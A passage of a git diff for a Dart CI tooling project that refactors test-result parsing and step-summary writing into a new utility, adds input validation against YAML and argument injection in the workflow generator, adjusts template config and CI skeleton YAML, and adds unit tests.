lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 
0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; - } - - /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. - static void writeTestJobSummary(TestResults results, int exitCode) { - final buf = StringBuffer(); - - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — ${escapeHtml(platformId)}'); - buf.writeln(); - - if (!results.parsed) { - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(artifactLink(':package: View full test logs')); - write(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - final stack = f.stackTrace.length > 1500 - ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' - : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); - buf.writeln(); - } - } - - buf.writeln('---'); - buf.writeln(artifactLink(':package: View full test logs')); - buf.writeln(); - - write(buf.toString()); - } - - static String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; - } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart new file mode 100644 index 0000000..8a18283 --- /dev/null +++ b/lib/src/cli/utils/test_results_util.dart @@ -0,0 +1,265 @@ +import 'dart:convert'; +import 'dart:io'; + +import 'logger.dart'; +import 'step_summary.dart'; + +/// A single failed test record parsed from the JSON reporter output. +class TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed aggregate test results from the NDJSON file reporter. +class TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List failures = []; + bool parsed = false; +} + +/// Test-results parsing and step-summary writing for CI. +abstract final class TestResultsUtil { + /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. 
+ static TestResults parseTestResultsJson(String jsonPath) { + final results = TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? 
''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; + } + + /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. + /// + /// Optional overrides are used by tests to capture deterministic output + /// without requiring CI environment variables. + static void writeTestJobSummary( + TestResults results, + int exitCode, { + String? platformId, + void Function(String markdown)? writeSummary, + }) { + final effectivePlatformId = + platformId ?? + Platform.environment['PLATFORM_ID'] ?? + Platform.environment['RUNNER_NAME'] ?? + Platform.operatingSystem; + final markdown = _buildTestJobSummaryMarkdown( + results: results, + exitCode: exitCode, + platformId: effectivePlatformId, + ); + final writer = writeSummary ?? StepSummary.write; + writer(markdown); + } + + static String _buildTestJobSummaryMarkdown({ + required TestResults results, + required int exitCode, + required String platformId, + }) { + final buf = StringBuffer(); + + buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + return buf.toString(); + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + final hasFailingStatus = results.failed > 0 || exitCode != 0; + + if (!hasFailingStatus) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else if (results.failed > 0) { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> Tests exited with code $exitCode despite no structured test failures.'); + } + buf.writeln(); + + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + final stack = f.stackTrace.length > 1500 + ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' + : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); + buf.writeln(); + } + } + + buf.writeln('---'); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + buf.writeln(); + return buf.toString(); + } + + static String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; + } +} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index b86c3de..130ff2c 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -57,6 +57,27 @@ const Set _knownFeatureKeys = { const Set _knownWebTestKeys = {'concurrency', 'paths'}; +/// Safe identifier for env vars and GitHub secrets (e.g. API_KEY, GITHUB_TOKEN). +/// Must start with letter or underscore, then alphanumeric/underscore only. +bool _isSafeSecretIdentifier(String s) { + return RegExp(r'^[A-Za-z_][A-Za-z0-9_]*$').hasMatch(s); +} + +/// Runner label must not contain newlines, control chars, or YAML-injection chars. +/// Allows alphanumeric, underscore, hyphen, dot (e.g. ubuntu-latest, runtime-ubuntu-24.04-x64). +bool _isSafeRunnerLabel(String s) { + if (s.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) return false; + if (RegExp('[{}:\[\]#@|>&*"\'\\\$]').hasMatch(s)) return false; + return RegExp(r'^[A-Za-z0-9_.-]+$').hasMatch(s); +} + +/// Sub-package names are rendered into YAML and shell-facing messages. +/// Keep them to a conservative character set. +bool _isSafeSubPackageName(String s) { + if (s.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) return false; + return RegExp(r'^[A-Za-z0-9_.-]+$').hasMatch(s); +} + /// Renders CI workflow YAML from a Mustache skeleton template and config.json. 
/// /// The skeleton uses `<% %>` delimiters (set via `{{=<% %>=}}` at the top) @@ -182,8 +203,8 @@ class WorkflowGenerator { return { 'tooling_version': toolingVersion, - 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', - 'line_length': '${ciConfig['line_length'] ?? 120}', + 'dart_sdk': ciConfig['dart_sdk'] as String, + 'line_length': _resolveLineLength(ciConfig['line_length']), 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags @@ -209,7 +230,7 @@ class WorkflowGenerator { 'sub_packages': subPackages .whereType>() .where((sp) => sp['name'] != null && sp['path'] != null) - .map((sp) => {'name': sp['name'], 'path': sp['path']}) + .map((sp) => {'name': (sp['name'] as String).trim(), 'path': (sp['path'] as String).trim()}) .toList(), // Platform support @@ -231,6 +252,15 @@ class WorkflowGenerator { return '1'; } + static String _resolveLineLength(dynamic raw) { + if (raw is int) return '$raw'; + if (raw is String) { + final parsed = int.tryParse(raw.trim()); + if (parsed != null) return '$parsed'; + } + return '120'; + } + /// Shared filter: extracts valid, normalized web test paths from config. static List _filteredWebTestPaths(Map ciConfig) { final webTestConfig = _getWebTestConfig(ciConfig); @@ -346,14 +376,53 @@ class WorkflowGenerator { final secrets = ciConfig['secrets']; if (secrets != null && secrets is! Map) { errors.add('ci.secrets must be an object, got ${secrets.runtimeType}'); + } else if (secrets is Map) { + for (final entry in secrets.entries) { + final key = entry.key; + final value = entry.value; + if (key is! String) { + errors.add('ci.secrets keys must be strings, got ${key.runtimeType}'); + continue; + } + if (!_isSafeSecretIdentifier(key)) { + errors.add('ci.secrets key "$key" must be a safe identifier (e.g. API_KEY, GITHUB_TOKEN)'); + } + if (value is String) { + if (!_isSafeSecretIdentifier(value)) { + errors.add('ci.secrets["$key"] value "$value" must be a safe secret name (e.g. 
MY_SECRET)'); + } + } + } } final pat = ciConfig['personal_access_token_secret']; if (pat != null && (pat is! String || pat.isEmpty)) { errors.add('ci.personal_access_token_secret must be a non-empty string'); + } else if (pat is String && !_isSafeSecretIdentifier(pat)) { + errors.add('ci.personal_access_token_secret "$pat" must be a safe identifier (e.g. GITHUB_TOKEN)'); } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); + } else if (lineLength is int) { + if (lineLength < 1 || lineLength > 10000) { + errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); + } + } else if (lineLength is String) { + final trimmed = lineLength.trim(); + if (trimmed.isEmpty) { + errors.add('ci.line_length string must not be empty or whitespace-only'); + } else if (trimmed != lineLength) { + errors.add('ci.line_length must not have leading/trailing whitespace'); + } else if (lineLength.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { + errors.add('ci.line_length must not contain newlines or control characters'); + } else { + final parsed = int.tryParse(lineLength); + if (parsed == null) { + errors.add('ci.line_length string must be numeric, got "$lineLength"'); + } else if (parsed < 1 || parsed > 10000) { + errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); + } + } } final platforms = ciConfig['platforms']; if (platforms != null) { @@ -389,6 +458,10 @@ class WorkflowGenerator { final pathValue = sp['path']; if (name is! 
String || name.trim().isEmpty) { errors.add('ci.sub_packages[].name must be a non-empty string'); + } else if (name != name.trim()) { + errors.add('ci.sub_packages[].name must not have leading/trailing whitespace'); + } else if (!_isSafeSubPackageName(name)) { + errors.add('ci.sub_packages[].name contains unsupported characters: "$name"'); } else if (!seenNames.add(name)) { errors.add('ci.sub_packages contains duplicate name "$name"'); } @@ -419,6 +492,16 @@ class WorkflowGenerator { errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo'); continue; } + if (normalized == '.') { + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not be repo root (".")'); + continue; + } + if (normalized.startsWith('-')) { + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not start with "-" (reserved for CLI options)', + ); + continue; + } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add( 'ci.sub_packages["${name is String ? name : '?'}"].path contains unsupported characters: "$pathValue"', @@ -449,6 +532,10 @@ class WorkflowGenerator { } if (value is! 
String || value.trim().isEmpty) { errors.add('ci.runner_overrides["$key"] must be a non-empty string'); + } else if (value != value.trim()) { + errors.add('ci.runner_overrides["$key"] must not have leading/trailing whitespace'); + } else if (!_isSafeRunnerLabel(value.trim())) { + errors.add('ci.runner_overrides["$key"] must not contain newlines, control chars, or unsafe YAML chars'); } } } @@ -508,6 +595,14 @@ class WorkflowGenerator { errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); continue; } + if (normalized == '.') { + errors.add('ci.web_test.paths[$i] must not be repo root (".")'); + continue; + } + if (normalized.startsWith('-')) { + errors.add('ci.web_test.paths[$i] must not start with "-" (reserved for CLI options)'); + continue; + } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); continue; diff --git a/lib/src/triage/utils/config.dart b/lib/src/triage/utils/config.dart index edbbcd2..4cd21d1 100644 --- a/lib/src/triage/utils/config.dart +++ b/lib/src/triage/utils/config.dart @@ -173,6 +173,15 @@ class TriageConfig { .toList(); } + /// Optional allowlist of organizations considered for cross-repo workflows. + List get crossRepoOrgs => _strList(['cross_repo', 'orgs'], []); + + /// Whether automatic cross-repo discovery is enabled. + bool get crossRepoDiscoveryEnabled => _bool(['cross_repo', 'discovery', 'enabled'], true); + + /// Organizations used for auto-discovery; falls back to [crossRepoOrgs]. 
+ List get crossRepoDiscoverySearchOrgs => _strList(['cross_repo', 'discovery', 'search_orgs'], crossRepoOrgs); + // ═══════════════════════════════════════════════════════════════════════════ // Labels (REQUIRED -- no hardcoded package-specific area labels) // ═══════════════════════════════════════════════════════════════════════════ diff --git a/templates/config.json b/templates/config.json index 5fa7efc..b5de060 100644 --- a/templates/config.json +++ b/templates/config.json @@ -14,7 +14,7 @@ "organization": "", "projects": [], "scan_on_pre_release": true, - "recent_errors_hours": 1440 + "recent_errors_hours": 168 }, "release": { "pre_release_scan_sentry": true, @@ -65,7 +65,7 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, - "personal_access_token_secret": "TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN", + "personal_access_token_secret": "GITHUB_TOKEN", "features": { "proto": false, "lfs": false, @@ -78,17 +78,11 @@ }, "secrets": {}, "sub_packages": [], - "_comment_web_test": "Optional: web_test runs 'dart test -p chrome' in a standalone ubuntu job. Requires 'web_test: true' in features.", - "web_test": { - "concurrency": 1, - "paths": [] - }, + "_comment_web_test": "Optional: when features.web_test is true, set web_test to { \"concurrency\": 1, \"paths\": [] } (or leave as {} to use defaults).", + "web_test": {}, "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). 
Keys must match ci.platforms entries.", - "runner_overrides": { - "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core", - "windows-arm64": "runtime-windows-11-arm64-208gb-64core" - } + "runner_overrides": {} } } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index da67d3e..939b08c 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -201,7 +201,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs @@ -395,6 +394,14 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform ── +<%#proto%> + - name: Install protoc + uses: arduino/setup-protoc@v3.0.0 + + - run: dart pub global activate protoc_plugin 25.0.0 + +<%/proto%> # ── shared:pub-get ── keep in sync with single_platform ── - run: dart pub get env: @@ -416,7 +423,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs PLATFORM_ID: ${{ matrix.platform_id }} @@ -516,7 +522,7 @@ jobs: run: dart run build_runner build --delete-conflicting-outputs <%/build_runner%> - # ── shared:proto-verify ── keep in sync with single_platform / multi_platform analyze ── + # ── shared:proto-verify ── keep in sync with single_platform / multi_platform ── <%#proto%> - name: Verify proto files run: dart run runtime_ci_tooling:manage_cicd verify-protos @@ -524,7 +530,7 @@ jobs: <%/proto%> - name: Setup Chrome id: setup-chrome - uses: browser-actions/setup-chrome@v2 + uses: browser-actions/setup-chrome@4f8e94349a351df0f048634f25fec36c3c91eded # v2.1.1 with: 
install-dependencies: true @@ -533,7 +539,7 @@ jobs: <%#web_test_has_paths%> - name: Web Test - run: dart test -p chrome --concurrency=<%web_test_concurrency%> <%web_test_paths%> + run: dart test -p chrome --concurrency=<%web_test_concurrency%> -- <%web_test_paths%> env: CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} <%/web_test_has_paths%> @@ -545,7 +551,7 @@ jobs: <%/web_test_has_paths%> - name: Upload web test artifacts on failure - if: failure() + if: failure() && hashFiles('**/test-results/**') != '' uses: actions/upload-artifact@v4 with: name: web-test-artifacts diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart new file mode 100644 index 0000000..d8d9531 --- /dev/null +++ b/test/cli_utils_test.dart @@ -0,0 +1,404 @@ +import 'dart:io'; + +import 'package:path/path.dart' as p; +import 'package:test/test.dart' hide TestFailure; + +import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; + +bool _canCreateSymlink() { + final tempDir = Directory.systemTemp.createTempSync('symlink_probe_'); + try { + final target = File(p.join(tempDir.path, 'target.txt')); + target.writeAsStringSync('ok'); + final linkPath = p.join(tempDir.path, 'link.txt'); + Link(linkPath).createSync(target.path); + return RepoUtils.isSymlinkPath(linkPath); + } on FileSystemException { + return false; + } finally { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + } +} + +void main() { + final symlinksSupported = _canCreateSymlink(); + + group('RepoUtils.resolveTestLogDir', () { + late Directory tempDir; + late String repoRoot; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('repo_utils_resolve_'); + repoRoot = tempDir.path; + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('returns default path when TEST_LOG_DIR is unset', () { + final resolved = RepoUtils.resolveTestLogDir( + 
repoRoot, + environment: const {}, + ); + expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); + }); + + test('returns default path when TEST_LOG_DIR is empty/whitespace', () { + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': ' '}, + ); + expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); + }); + + test('throws when TEST_LOG_DIR contains control characters', () { + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': '/tmp/logs\nbad'}, + ), + throwsA(isA()), + ); + }); + + test('throws when TEST_LOG_DIR is relative', () { + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), + throwsA(isA()), + ); + }); + + test('throws when TEST_LOG_DIR is outside RUNNER_TEMP', () { + final runnerTemp = p.join(repoRoot, 'runner-temp'); + final outside = p.join(repoRoot, 'outside', 'logs'); + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), + throwsA(isA()), + ); + }); + + test('accepts TEST_LOG_DIR inside RUNNER_TEMP', () { + final runnerTemp = p.join(repoRoot, 'runner-temp'); + final inside = p.join(runnerTemp, 'logs'); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': inside}, + ); + expect(resolved, equals(inside)); + }); + }); + + group('RepoUtils filesystem safety', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('repo_utils_fs_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('ensureSafeDirectory creates a missing normal directory', () { + final dirPath = p.join(tempDir.path, 'logs'); + RepoUtils.ensureSafeDirectory(dirPath); + expect(Directory(dirPath).existsSync(), isTrue); + expect(RepoUtils.isSymlinkPath(dirPath), 
isFalse); + }); + + test('writeFileSafely writes to a normal file path', () { + final filePath = p.join(tempDir.path, 'stdout.log'); + RepoUtils.writeFileSafely(filePath, 'hello world'); + expect(File(filePath).readAsStringSync(), equals('hello world')); + }); + + test('writeFileSafely appends when FileMode.append is used', () { + final filePath = p.join(tempDir.path, 'stdout.log'); + RepoUtils.writeFileSafely(filePath, 'hello'); + RepoUtils.writeFileSafely(filePath, ' world', mode: FileMode.append); + expect(File(filePath).readAsStringSync(), equals('hello world')); + }); + + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); + }); + + group('TestResultsUtil.parseTestResultsJson', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('test_results_parse_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('returns unparsed empty results when file does not exist', () { + final missingPath = p.join(tempDir.path, 'missing.json'); + final results = TestResultsUtil.parseTestResultsJson(missingPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + 
expect(results.failures, isEmpty); + }); + + test('parses pass/fail/skipped counts and failure details', () { + final jsonPath = p.join(tempDir.path, 'results.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":1,"name":"passes"},"time":100}', + '{"type":"testDone","testID":1,"result":"success","hidden":false,"skipped":false,"time":120}', + '{"type":"testStart","test":{"id":2,"name":"fails"},"time":130}', + '{"type":"print","testID":2,"message":"hello from test"}', + '{"type":"error","testID":2,"error":"boom","stackTrace":"trace line"}', + '{"type":"testDone","testID":2,"result":"failure","hidden":false,"skipped":false,"time":170}', + '{"type":"testStart","test":{"id":3,"name":"skipped"},"time":180}', + '{"type":"testDone","testID":3,"result":"success","hidden":false,"skipped":true,"time":190}', + '{"type":"done","time":200}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, equals(1)); + expect(results.failed, equals(1)); + expect(results.skipped, equals(1)); + expect(results.totalDurationMs, equals(200)); + expect(results.failures, hasLength(1)); + expect(results.failures.first.name, equals('fails')); + expect(results.failures.first.error, contains('boom')); + expect(results.failures.first.stackTrace, contains('trace line')); + expect(results.failures.first.printOutput, contains('hello from test')); + expect(results.failures.first.durationMs, equals(40)); + }); + + test('ignores malformed JSON lines and hidden test entries', () { + final jsonPath = p.join(tempDir.path, 'results.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":10,"name":"hidden fail"},"time":10}', + '{bad json line', + '{"type":"error","testID":10,"error":"hidden boom","stackTrace":"hidden trace"}', + '{"type":"testDone","testID":10,"result":"failure","hidden":true,"skipped":false,"time":20}', + 
